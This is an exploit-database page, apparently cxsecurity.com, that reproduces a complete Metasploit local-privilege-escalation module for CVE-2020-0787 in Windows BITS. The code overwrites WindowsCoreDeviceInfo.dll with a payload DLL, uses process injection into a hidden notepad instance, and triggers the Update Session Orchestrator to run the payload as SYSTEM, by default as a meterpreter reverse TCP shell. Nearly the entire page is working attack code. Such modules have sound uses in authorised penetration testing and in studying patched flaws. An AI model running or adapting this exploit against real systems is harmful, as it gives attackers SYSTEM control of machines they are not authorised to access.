Background Intelligent Transfer Service Privilege Escalation

2020.06.12
Credit: itm4n
Risk: Medium
Local: No
Remote: Yes
CWE: CWE-264


Ogólna skala CVSS: 7.2/10
Znaczenie: 10/10
Łatwość wykorzystania: 3.9/10
Wymagany dostęp: Lokalny
Złożoność ataku: Niska
Autoryzacja: Nie wymagana
Wpływ na poufność: Pełny
Wpływ na integralność: Pełny
Wpływ na dostępność: Pełny

## # This module requires Metasploit: https://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## class MetasploitModule < Msf::Exploit::Local Rank = ExcellentRanking include Msf::Post::Windows::Priv include Msf::Exploit::EXE # Needed for generate_payload_dll include Msf::Post::Windows::FileSystem include Msf::Post::Windows::ReflectiveDLLInjection include Msf::Exploit::FileDropper include Msf::Post::File include Msf::Exploit::Remote::AutoCheck def initialize(info = {}) super( update_info( info, 'Name' => 'Background Intelligent Transfer Service Arbitrary File Move Privilege Elevation Vulnerability', 'Description' => %q{ This module exploits CVE-2020-0787, an arbitrary file move vulnerability in outdated versions of the Background Intelligent Transfer Service (BITS), to overwrite C:\Windows\System32\WindowsCoreDeviceInfo.dll with a malicious DLL containing the attacker's payload. To achieve code execution as the SYSTEM user, the Update Session Orchestrator service is then started, which will result in the malicious WindowsCoreDeviceInfo.dll being run with SYSTEM privileges due to a DLL hijacking issue within the Update Session Orchestrator Service. Note that presently this module only works on Windows 10 and Windows Server 2016 and later as the Update Session Orchestrator Service was only introduced in Windows 10. Note that only Windows 10 has been tested, so your mileage may vary on Windows Server 2016 and later. }, 'License' => MSF_LICENSE, 'Author' => [ 'itm4n', # PoC 'gwillcox-r7' # msf module ], 'Platform' => ['win'], 'SessionTypes' => ['meterpreter'], 'Privileged' => true, 'Arch' => [ARCH_X86, ARCH_X64], 'Targets' => [ [ 'Windows DLL Dropper', { 'Arch' => [ARCH_X86, ARCH_X64], 'Type' => :windows_dropper } ], ], 'DefaultTarget' => 0, 'DisclosureDate' => '2020-03-10', 'References' => [ ['CVE', '2020-0787'], ['URL', 'https://itm4n.github.io/cve-2020-0787-windows-bits-eop/'], ['URL', 'https://github.com/itm4n/BitsArbitraryFileMove'], ['URL', 'https://attackerkb.com/assessments/e61cfec0-d766-4e7e-89f7-5aad2460afb8'], ['URL', 'https://googleprojectzero.blogspot.com/2018/04/windows-exploitation-tricks-exploiting.html'], ['URL', 'https://itm4n.github.io/usodllloader-part1/'], ['URL', 'https://itm4n.github.io/usodllloader-part2/'], ], 'Notes' => { 'SideEffects' => [ ARTIFACTS_ON_DISK ], 'Reliability' => [ REPEATABLE_SESSION ], 'Stability' => [ CRASH_SAFE ] }, 'DefaultOptions' => { 'EXITFUNC' => 'thread', 'PAYLOAD' => 'windows/x64/meterpreter/reverse_tcp', 'WfsDelay' => 900 } ) ) register_options([ OptBool.new('OVERWRITE_DLL', [true, 'Overwrite WindowsCoreDeviceInfo.dll if it exists (false by default).', false]), OptInt.new('JOB_WAIT_TIME', [true, 'Time to wait for the BITS job to complete before starting the USO service to execute the uploaded payload, in seconds', 20]) ]) end def target_not_presently_supported print_warning('This target is not presently supported by this exploit. Support may be added in the future!') print_warning('Attempts to exploit this target with this module WILL NOT WORK!') end def check sysinfo_value = sysinfo['OS'] if sysinfo_value !~ /windows/i # Non-Windows systems are definitely not affected. return CheckCode::Safe('Target is not a Windows system, so it is not affected by this vulnerability!') end # XXX Using session.shell_command_token over cmd_exec() here as @wvu-r7 noticed cmd_exec() was broken under some situations. build_num_raw = session.shell_command_token('cmd.exe /c ver') build_num = build_num_raw.match(/\d+\.\d+\.\d+\.\d+/) if build_num.nil? print_error("Couldn't retrieve the target's build number!") else build_num = build_num_raw.match(/\d+\.\d+\.\d+\.\d+/)[0] print_status("Target's build number: #{build_num}") end # see https://docs.microsoft.com/en-us/windows/release-information/ unless sysinfo_value =~ /(7|8|8\.1|10|2008|2012|2016|2019|1803|1903)/ return CheckCode::Safe('Target is not running a vulnerable version of Windows!') end build_num_gemversion = Gem::Version.new(build_num) # Build numbers taken from https://www.qualys.com/research/security-alerts/2020-03-10/microsoft/ if (build_num_gemversion >= Gem::Version.new('10.0.18363.0')) && (build_num_gemversion < Gem::Version.new('10.0.18363.719')) # Windows 10 v1909 return CheckCode::Appears('Vulnerable Windows 10 v1909 build detected!') elsif (build_num_gemversion >= Gem::Version.new('10.0.18362.0')) && (build_num_gemversion < Gem::Version.new('10.0.18362.719')) # Windows 10 v1903 return CheckCode::Appears('Vulnerable Windows 10 v1903 build detected!') elsif (build_num_gemversion >= Gem::Version.new('10.0.17763.0')) && (build_num_gemversion < Gem::Version.new('10.0.17763.1098')) # Windows 10 v1809 return CheckCode::Appears('Vulnerable Windows 10 v1809 build detected!') elsif (build_num_gemversion >= Gem::Version.new('10.0.17134.0')) && (build_num_gemversion < Gem::Version.new('10.0.17134.1365')) # Windows 10 v1803 return CheckCode::Appears('Vulnerable Windows 10 v1803 build detected!') elsif (build_num_gemversion >= Gem::Version.new('10.0.16299.0')) && (build_num_gemversion < Gem::Version.new('10.0.16299.1747')) # Windows 10 v1709 return CheckCode::Appears('Vulnerable Windows 10 v1709 build detected!') elsif (build_num_gemversion >= Gem::Version.new('10.0.15063.0')) && (build_num_gemversion < Gem::Version.new('10.0.15063.2313')) # Windows 10 v1703 return CheckCode::Appears('Vulnerable Windows 10 v1703 build detected!') elsif (build_num_gemversion >= Gem::Version.new('10.0.14393.0')) && (build_num_gemversion < Gem::Version.new('10.0.14393.3564')) # Windows 10 v1607 return CheckCode::Appears('Vulnerable Windows 10 v1607 build detected!') elsif (build_num_gemversion >= Gem::Version.new('10.0.10586.0')) && (build_num_gemversion < Gem::Version.new('10.0.10586.9999999')) # Windows 10 v1511 return CheckCode::Appears('Vulnerable Windows 10 v1511 build detected!') elsif (build_num_gemversion >= Gem::Version.new('10.0.10240.0')) && (build_num_gemversion < Gem::Version.new('10.0.10240.18519')) # Windows 10 v1507 return CheckCode::Appears('Vulnerable Windows 10 v1507 build detected!') elsif (build_num_gemversion >= Gem::Version.new('6.3.9600.0')) && (build_num_gemversion < Gem::Version.new('6.3.9600.19665')) # Windows 8.1/Windows Server 2012 R2 target_not_presently_supported return CheckCode::Appears('Vulnerable Windows 8.1/Windows Server 2012 R2 build detected!') elsif (build_num_gemversion >= Gem::Version.new('6.2.9200.0')) && (build_num_gemversion < Gem::Version.new('6.2.9200.23009')) # Windows 8/Windows Server 2012 target_not_presently_supported return CheckCode::AppearsAppears('Vulnerable Windows 8/Windows Server 2012 build detected!') elsif (build_num_gemversion >= Gem::Version.new('6.1.7600.0')) && (build_num_gemversion < Gem::Version.new('6.1.7601.24549')) # Windows 7/Windows Server 2008 R2 target_not_presently_supported return CheckCode::Appears('Vulnerable Windows 7/Windows Server 2008 R2 build detected!') elsif (build_num_gemversion >= Gem::Version.new('6.0.6001.0')) && (build_num_gemversion < Gem::Version.new('6.0.6003.20749')) # Windows Server 2008/Windows Server 2008 SP2 target_not_presently_supported return CheckCode::Appears('Windows Server 2008/Windows Server 2008 SP2 build detected!') else return CheckCode::Safe('The build number of the target machine does not appear to be a vulnerable version!') end end def check_target_is_running_supported_windows_version if sysinfo['OS'].match('Windows').nil? fail_with(Failure::NotVulnerable, 'Target is not running Windows!') elsif sysinfo['OS'].match('Windows 10').nil? && sysinfo['OS'].match('Windows Server 2016').nil? && sysinfo['OS'].match('Windows Server 2019').nil? fail_with(Failure::BadConfig, 'Target is running Windows, its not a version this module supports! Bailing...') end end def check_target_and_payload_match_and_supported(client_arch) if (client_arch != ARCH_X64) && (client_arch != ARCH_X86) fail_with(Failure::BadConfig, 'This exploit currently only supports x86 and x64 targets!') end payload_arch = payload.arch.first # TODO: Add missing documentation for payload.arch, @wvu used this first but it is not documented anywhere. if (payload_arch != ARCH_X64) && (payload_arch != ARCH_X86) fail_with(Failure::BadConfig, "Unsupported payload architecture (#{payload_arch})") # Unsupported architecture, so return an error. end if ((client_arch == ARCH_X64) && (payload_arch != ARCH_X64)) || ((client_arch == ARCH_X86) && (payload_arch != ARCH_X86)) fail_with(Failure::BadConfig, "Payload architecture (#{payload_arch}) doesn't match the architecture of the target (#{client_arch})!") end end def check_windowscoredeviceinfo_dll_exists_on_target # Taken from bwatters-r7's cve-2020-0688_service_tracing.rb code. # # We are going to overwrite the WindowsCoreDeviceInfo.dll DLL as part of our exploit. # The second part of this exploit will trigger a Update Session to be created so that this DLL # is loaded, which will result in arbitrary code execution as SYSTEM. # # To prevent any errors, we will first check that this file doesn't exist and ask the user if they are sure # that they want to overwrite the file. win_dir = session.sys.config.getenv('windir') normal_target_payload_pathname = "#{win_dir}\\System32\\WindowsCoreDeviceInfo.dll" wow64_target_payload_pathname = "#{win_dir}\\Sysnative\\WindowsCoreDeviceInfo.dll" wow64_existing_file = "#{win_dir}\\Sysnative\\win32k.sys" if file?(wow64_existing_file) if file?(wow64_target_payload_pathname) print_warning("#{wow64_target_payload_pathname} already exists") print_warning('If it is in use, the overwrite will fail') unless datastore['OVERWRITE_DLL'] print_error('Change OVERWRITE_DLL option to true if you would like to proceed.') fail_with(Failure::BadConfig, "#{wow64_target_payload_pathname} already exists and OVERWRITE_DLL option is false") end end target_payload_pathname = wow64_target_payload_pathname elsif file?(normal_target_payload_pathname) print_warning("#{normal_target_payload_pathname} already exists") print_warning('If it is in use, the overwrite will fail') unless datastore['OVERWRITE_DLL'] print_error('Change OVERWRITE_DLL option to true if you would like to proceed.') fail_with(Failure::BadConfig, "#{normal_target_payload_pathname} already exists and OVERWRITE_DLL option is false") end target_payload_pathname = normal_target_payload_pathname end target_payload_pathname end def launch_background_injectable_notepad print_status('Launching notepad to host the exploit...') notepad_process = client.sys.process.execute('notepad.exe', nil, 'Hidden' => true) process = client.sys.process.open(notepad_process.pid, PROCESS_ALL_ACCESS) print_good("Process #{process.pid} launched.") process rescue Rex::Post::Meterpreter::RequestError # Sandboxes could not allow to create a new process # stdapi_sys_process_execute: Operation failed: Access is denied. print_error('Operation failed. Trying to elevate the current process...') process = client.sys.process.open process end def exploit # NOTE: Automatic check is implemented by the AutoCheck mixin super # Step 1: Check target environment is correct. print_status('Step #1: Checking target environment...') if is_system? fail_with(Failure::None, 'Session is already elevated') end client_arch = sysinfo['Architecture'] check_target_is_running_supported_windows_version check_target_and_payload_match_and_supported(client_arch) check_windowscoredeviceinfo_dll_exists_on_target # Step 2: Generate the malicious DLL and upload it to a temp location. print_status('Step #2: Generating the malicious DLL...') path = ::File.join(Msf::Config.data_directory, 'exploits', 'CVE-2020-0787') datastore['EXE::Path'] = path if client_arch =~ /x86/i datastore['EXE::Template'] = ::File.join(path, 'template_x86_windows.dll') library_path = ::File.join(Msf::Config.data_directory, 'exploits', 'CVE-2020-0787', 'CVE-2020-0787.x86.dll') library_path = ::File.expand_path(library_path) elsif client_arch =~ /x64/i datastore['EXE::Template'] = ::File.join(path, 'template_x64_windows.dll') library_path = ::File.join(Msf::Config.data_directory, 'exploits', 'CVE-2020-0787', 'CVE-2020-0787.x64.dll') library_path = ::File.expand_path(library_path) end payload_dll = generate_payload_dll print_status("Payload DLL is #{payload_dll.length} bytes long") temp_directory = session.sys.config.getenv('%TEMP%') malicious_dll_location = "#{temp_directory}\\" + Rex::Text.rand_text_alpha(6..13) + '.dll' write_file(malicious_dll_location, payload_dll) register_file_for_cleanup(malicious_dll_location) # Step 3: Load the main DLL that will trigger the exploit and conduct the arbitrary file copy. print_status('Step #3: Loading the exploit DLL to run the main exploit...') process = launch_background_injectable_notepad print_status("Injecting DLL into #{process.pid}...") exploit_mem, offset = inject_dll_into_process(process, library_path) dll_info_parameter = malicious_dll_location.to_s payload_mem = inject_into_process(process, dll_info_parameter) # invoke the exploit, passing in the address of the payload that # we want invoked on successful exploitation. print_status('DLL injected. Executing injected DLL...') process.thread.create(exploit_mem + offset, payload_mem) print_status("Sleeping for #{datastore['JOB_WAIT_TIME']} seconds to allow the exploit to run...") sleep datastore['JOB_WAIT_TIME'] register_file_for_cleanup('C:\\Windows\\System32\\WindowsCoreDeviceInfo.dll') # Register this file for cleanup so that if we fail, then the file is cleaned up. # Normally we can't delete this file though as there will be a SYSTEM service that has a handle to this file. print_status("Starting the interactive scan job...") # Step 4: Execute `usoclient StartInteractiveScan` to trigger the payload # XXX Using session.shell_command_token over cmd_exec() here as @wvu-r7 noticed cmd_exec() was broken under some situations. session.shell_command_token('usoclient StartInteractiveScan') print_status("Enjoy the shell!") end end


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2020, cxsecurity.com

 

Back to Top